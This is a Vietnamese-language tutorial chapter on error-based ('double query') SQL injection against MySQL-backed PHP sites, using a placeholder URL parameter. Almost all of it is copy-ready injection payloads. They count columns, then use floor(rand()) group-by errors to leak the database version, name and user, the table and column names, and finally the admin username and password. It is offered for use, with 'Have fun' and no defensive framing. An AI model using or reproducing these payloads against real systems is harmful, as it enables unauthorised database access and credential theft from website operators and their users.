[Chap 8] Double query injection

- Check lỗi

http://www.site.com/index.php?id=1 order by 100--+-     * Error
http://www.site.com/index.php?id=1 order by 1--+-         * No error
http://www.site.com/index.php?id=1 order by 10--+-       * No error
http://www.site.com/index.php?id=1 order by 15--+-       * Error
http://www.site.com/index.php?id=1 order by 11--+-          Error

ok. Tiếp theo là bước quen thuộc: union

- union

http://www.site.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10--+-

Ta sẽ nhận được thông báo lỗi như sau:

The used SELECT statements have a different number of columns.

Giờ ta sẽ bắt đầu querry theo các bước sau

1. Get version

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

2. Get database name

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

3. Get user

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

4. Get số tables

http://www.site.com/index.php?id=1  and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xtên-database-dạng-hex )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

5. Get tên các tables

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xtên-database-dạng-hex limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+-

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xtên-database-dạng-hex limit 0,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

Các bạn chú ý tăng dần cái limit 0,1 cho tới khi tìm được tables cần tìm nhé (Tables chứa user và pass) cấu trúc của nó là  limit N,1 ở đây ta tăng dần giá trị N

sau khi đã xác định được tables chứa user và pass ta tiến hành get column

6. Get số lượng column

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xtên-database-dạng-hex AND table_name=0xtên-tables-dạng-hex )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

7. Get tên column

http://www.site.com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xtên-database-dạng-hex AND table_name=0xtên-tables-dạng-hex limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

8. Get username và pass

http://www.site.com/index.php?id=1  and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tên-talbes.tên-cloumn as char),0x27,0x7e) FROM `tên-databse`.admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+- 

http://www.site.com/index.php?id=1  and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tên-talbes.tên-cloumn as char),0x27,0x7e) FROM `tên-databse`.admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+-

Done. Have fun. Ai copy làm ơn đề dùm cái nguồn